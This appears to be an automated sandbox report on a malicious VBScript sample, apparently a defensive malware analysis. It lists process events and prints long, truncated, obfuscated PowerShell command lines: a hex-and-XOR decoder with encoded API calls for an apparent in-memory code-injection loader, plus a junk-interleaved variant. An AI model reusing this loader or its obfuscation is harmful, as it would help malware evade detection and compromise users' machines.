Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$campemen); $larde = new-object byte[] ($campemen.length / 2); for($turl=0; $turl -lt $campemen.length; $turl+=2){ $larde[$turl/2] = [convert]::tobyte($campemen.substring($turl, 2), 16); $larde[$turl/2] = ($larde[$turl/2] -bxor 89); } [string][system.text.encoding]::ascii.getstring($larde);}$anton0=htb '0a202a2d3c34773d3535';$anton1=htb '14303a2b362a363f2d770e30376a6b770c372a383f3c17382d302f3c143c2d31363d2a';$anton2=htb '1e3c2d092b363a183d3d2b3c2a2a';$anton3=htb '0a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f';$anton4=htb '2a2d2b30373e';$anton5=htb '1e3c2d14363d2c353c1138373d353c';$anton6=htb '0b0d0a293c3a3038351738343c757911303d3c1b200a303e7579092c3b35303a';$anton7=htb '0b2c372d30343c7579143837383e3c3d';$anton8=htb '0b3c3f353c3a2d3c3d1d3c353c3e382d3c';$anton9=htb '1037143c34362b2014363d2c353c';$unitedn0=htb '14201d3c353c3e382d3c0d20293c';$unitedn1=htb '1a35382a2a7579092c3b35303a75790a3c38353c3d757918372a301a35382a2a7579182c2d361a35382a2a';$unitedn2=htb '10372f36323c';$unitedn3=htb '092c3b35303a757911303d3c1b200a303e7579173c2e0a35362d75790f302b2d2c3835';$unitedn4=htb '0f302b2d2c3835183535363a';$unitedn5=htb '372d3d3535';$unitedn6=htb '172d092b362d3c3a2d0f302b2d2c3835143c34362b20';$unitedn7=htb '101c01';$unitedn8=htb '05';function fkp {param ($patro40, $selvf) ;$cont0 =htb '7d1d303a2d382d3679647971021829291d36343830370463631a2c2b2b3c372d1d3634383037771e3c2d182a2a3c343b35303c2a71707925790e313c2b3c74163b333c3a2d7922797d06771e35363b3835182a2a3c343b35201a383a313c797418373d797d067715363a382d303637770a2935302d717d0c37302d3c3d37617002746804771c282c38352a717d38372d36376970792470771e3c2d0d20293c717d38372d36376870';&($unitedn7) $cont0;$cont5 = htb '7d1b2b3c3d3d7964797d1d303a2d382d36771e3c2d143c2d31363d717d38372d36376b7579020d20293c0204047919717d38372d36376a75797d38372d36376d7070';&($unitedn7) $cont5;$cont1 = htb '2b3c2d2c2b37797d1b2b3c3d3d7710372f36323c717d372c353575791971020a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f0471173c2e74163b333c3a2d790a202a2d3c34770b2c372d30343c7710372d3c2b36290a3c2b2f303a3c2a771138373d353c0b3c3f7171173c2e74163b333c3a2d7910372d092d2b707579717d1d303a2d382d36771e3c2d143c2d31363d717d38372d36376c70707710372f36323c717d372c3535757919717d09382d2b366d697070707075797d0a3c352f3f7070';&($unitedn7) $cont1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $knsski,[parameter(position = 1)] [type] $semitiskeo = [void]);$cont2 = htb '7d0f363a382d3036796479021829291d36343830370463631a2c2b2b3c372d1d3634383037771d3c3f30373c1d20373834303a182a2a3c343b35207171173c2e74163b333c3a2d790a202a2d3c34770b3c3f353c3a2d30363777182a2a3c343b35201738343c717d38372d36376170707579020a202a2d3c34770b3c3f353c3a2d303637771c34302d77182a2a3c343b35201b2c30353d3c2b183a3a3c2a2a0463630b2c3770771d3c3f30373c1d2037383430 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Paraple = """PreFMreuLaunPencLivtBleiSrvoscynBid RemHPyrTgenBVid kns{Obj Man Pin Hol WhipSluaFetrHreaBatmDar(Avi[NavSSkutTilrSpeiKronFisgGan]She`$HalcModaSpimRadpReneLuemmumematnMes)Cro;Imp res Bif Ovi pac`$UtoLevaaProrDridTraeLay Rho=Syg ConNvegeSpiwRaa-StiOFaibBemjBeketaacMictBln NeobForytrotDjveBog[Sam]Pri Pro(Qua`$LancSmpaUnnmRodpBadeAnamBaleNonnIns.RakLSteeSadnStigSertHeghLej And/eol Hyl2Lav)Pro;Som Kle Sub Lip AraFDisoTilrFor(Pse`$unfTGteuStarRvelSto=bla0Jer;Out Ste`$UdsTSkauSparFrplUvu Sej-PenlUnmtsal Sla`$PescvskaSofmPropGadePermAdaeAfknUnd.StuLBefeStanRdggSuctReghIns;unh Fas`$MonTEuduMunrSpelOpg+Ald=Mid2Nst)Lse{Fea Udp Qui Din Bak Byn Rev Gul Mis`$BlkLFosascorMicddateWom[Agr`$OutTUnluDokrRullEsd/Phi2res]Ado Pse=Neg Rum[phicDatosalnlntvBroeNocrAsitFry]Uds:Avn:HanTCleoForBSagyNiltIreeAfn(Sce`$BoycFusaappmOutpHeleAkamEgleYnknMel.TarSVrduKnibRelsfustBarrJeaiSadnHelgRll(Cas`$metTUdbuEurrPenlInh,Phy Stu2Und)Gra,Hop Arn1Mod6Squ)Lse;Mel Fro Baa`$SkoLParaUndrtundVineCru[Bra`$BalTkopuCimrDimlcon/Blo2Alt]Mis Tit=Pan Web(Dis`$BypLinkaFrarholdSupeCas[Eks`$ProTDoouTonrCorlFeb/Ste2Afp]Prt Ocu-BolbFelxBatoTurrTam Cow8Con9Unm)Non;God Wum Exe Ned Aha}For Dri[NonSthrtstarkariPannRengEtr]Sty[SpiSAntyLyksSkotAllePosmUnr.NedTHydeSkixDritDeb.udlEDomnSmicPanoCoadMisiMicnHydgUun]Dal:bil:skoAMenSEgeCKlaIcelIbas.AfgGHezeUnotindSFugtSynrTeliMornFyrgHov(Kon`$AlkLgodaCrerFildSadeAfr)Sav;San}Uta`$AddaHjenSodtOrgoOvenWil0Ank=GruHThrTChuBBra Min'Coi0ParASlu2Mas0Tas2EndAtra2KurDSma3TakCHiv3Tet4Sju7Evy7Stj3IntDsab3Pec5For3Str5Duo'Ove;Tem`$AntaTrunUnctUnfoPatnBlu1Moo=LamHSigTaviBklu Bla'Fri1bli4Kut3Cor0Sik3PodASum2HjuBKed3Udv6Pol2fasADir3Bik6Bus3AnvFEsc2MisDWel7Mal7Per0ReaEhol3Req0Kao3unh7Ove6ResAGra6SubBMjs7for7Pro0ForCGon3Sco7Und2RydAIfr3Kon8Asm3ExcFNya3ansCSpa1Mar7Tri3Kor8Jag2UnpDLse3san0Ube2PolFFor3BulCChr1Fru4Def3TykCDra2SjuDUpa3Khi1Gre3Ant6cho3QuiDCar2TinAAss'Kli;Tvr`$yeoaFabnMustTreoTodnRes2Soc=EpiHIndTSacBSde Aut'Spa1DybEBea3DenCBoo2DiaDSer0dis9Cig2PriBBla3Fre6Vag3LokAScr1For8Bun3iriDKom3UnpDOma2DroBGas3RipCCoa2CarASin2GunAGoo'Lyd;Bef`$BaraXannOvetRitoDepnDry3Nas=PseHOenTPakBWar Sca'tek0BarADel2Pju0Bra2ConAMan2OttDMed3GerCTra3Reg4Ind7Uns7Top0DixBsel2NymCKom3Tan7Pte2DolDSud3Mcc0bra3Sta4Epi3OrnCStu7For7Gar1Stn0til3Sen7Mic2NihDIns3SecCEmb2StvBAnn3Reg6Opl2fra9Dow0UndABlo3OesCval2FebBRum2BekFNon3Las0Spi3SkaABli3JumCHaz2TedAHor7Lea7Aft1Hid1Reg3Afr8Udb3Kon7Sej3DafDred3kno5Men3MylCPos0NonBDis3MddCSyk3AffFPer'For;Tnd`$NitaTilnOpmtForoFinnCoa4Sto=OpsHmagTCodBUnq Und'Leg2HazAMbl2SolDTra2ButBKir3Par0Str3Bib7mis3MusEIno'Nic;Cou`$TilaPalnPritLavoultnove5Tva=AntHSejTSkrBDem Tra'Sor1StaEEnd3MerCKon2SanDmim1Fla4Udf3Ver6Mil3NeeDBri2SkfCkum3Ing5Lyr3SanCKis1Saf1Ned3Vel8Coe3plo7Kol3DesDFor3Tap5Con3TorCafr'unf;Tor`$KliaAndnMertBloovejnKer6Hij=MolHLehTBarBDis pac'Stu0UdsBPol0SndDLis0EnfASyp2Cam9Lin3besCSta3MilAUne3Bac0Brn3Mar8Bra3Int5Vog1Mus7Cou3Arb8Fis3Rea4Dop3TraCPri7P Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$campemen); $Larde = New-Object byte[] ($campemen.Length / 2); For($Turl=0; $Turl -lt $campemen.Length; $Turl+=2){ $Larde[$Turl/2] = [convert]::ToByte($campemen.Substring($Turl, 2), 16); $Larde[$Turl/2] = ($Larde[$Turl/2] -bxor 89); } [String][System.Text.Encoding]::ASCII.GetString($Larde);}$anton0=HTB '0A202A2D3C34773D3535';$anton1=HTB '14303A2B362A363F2D770E30376A6B770C372A383F3C17382D302F3C143C2D31363D2A';$anton2=HTB '1E3C2D092B363A183D3D2B3C2A2A';$anton3=HTB '0A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F';$anton4=HTB '2A2D2B30373E';$anton5=HTB '1E3C2D14363D2C353C1138373D353C';$anton6=HTB '0B0D0A293C3A3038351738343C757911303D3C1B200A303E7579092C3B35303A';$anton7=HTB '0B2C372D30343C7579143837383E3C3D';$anton8=HTB '0B3C3F353C3A2D3C3D1D3C353C3E382D3C';$anton9=HTB '1037143C34362B2014363D2C353C';$Unitedn0=HTB '14201D3C353C3E382D3C0D20293C';$Unitedn1=HTB '1A35382A2A7579092C3B35303A75790A3C38353C3D757918372A301A35382A2A7579182C2D361A35382A2A';$Unitedn2=HTB '10372F36323C';$Unitedn3=HTB '092C3B35303A757911303D3C1B200A303E7579173C2E0A35362D75790F302B2D2C3835';$Unitedn4=HTB '0F302B2D2C3835183535363A';$Unitedn5=HTB '372D3D3535';$Unitedn6=HTB '172D092B362D3C3A2D0F302B2D2C3835143C34362B20';$Unitedn7=HTB '101C01';$Unitedn8=HTB '05';function fkp {Param ($Patro40, $Selvf) ;$Cont0 =HTB '7D1D303A2D382D3679647971021829291D36343830370463631A2C2B2B3C372D1D3634383037771E3C2D182A2A3C343B35303C2A71707925790E313C2B3C74163B333C3A2D7922797D06771E35363B3835182A2A3C343B35201A383A313C797418373D797D067715363A382D303637770A2935302D717D0C37302D3C3D37617002746804771C282C38352A717D38372D36376970792470771E3C2D0D20293C717D38372D36376870';&($Unitedn7) $Cont0;$Cont5 = HTB '7D1B2B3C3D3D7964797D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376B7579020D20293C0204047919717D38372D36376A75797D38372D36376D7070';&($Unitedn7) $Cont5;$Cont1 = HTB '2B3C2D2C2B37797D1B2B3C3D3D7710372F36323C717D372C353575791971020A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F0471173C2E74163B333C3A2D790A202A2D3C34770B2C372D30343C7710372D3C2B36290A3C2B2F303A3C2A771138373D353C0B3C3F7171173C2E74163B333C3A2D7910372D092D2B707579717D1D303A2D382D36771E3C2D143C2D31363D717D38372D36376C70707710372F36323C717D372C3535757919717D09382D2B366D697070707075797D0A3C352F3F7070';&($Unitedn7) $Cont1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Knsski,[Parameter(Position = 1)] [Type] $Semitiskeo = [Void]);$Cont2 = HTB '7D0F363A382D3036796479021829291D36343830370463631A2C2B2B3C372D1D3634383037771D3C3F30373C1D20373834303A182A2A3C343B35207171173C2E74163B333C3A2D790A202A2D3C34770B3C3F353C3A2D30363777182A2A3C343B35201738343C717D38372D36376170707579020A202A2D3C34770B3C3F353C3A2D303637771C34302D77182A2A3C343B35201B2C30353D3C2B183A3A3C2A2A0463630B2C3770771D3C3F30373C1D2037383430 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 757929 Sample: 204789503327.vbs Startdate: 01/12/2022 Architecture: WINDOWS Score: 60 6 wscript.exe 2 2->6         started        signatures3 16 VBScript performs obfuscated calls to suspicious functions 6->16 18 Wscript starts Powershell (via cmd or directly) 6->18 20 Obfuscated command line found 6->20 22 Very long command line found 6->22 9 powershell.exe 5 6->9         started        process4 signatures5 24 Very long command line found 9->24 12 conhost.exe 9->12         started        14 powershell.exe 9->14         started        process6
No contacted IP infos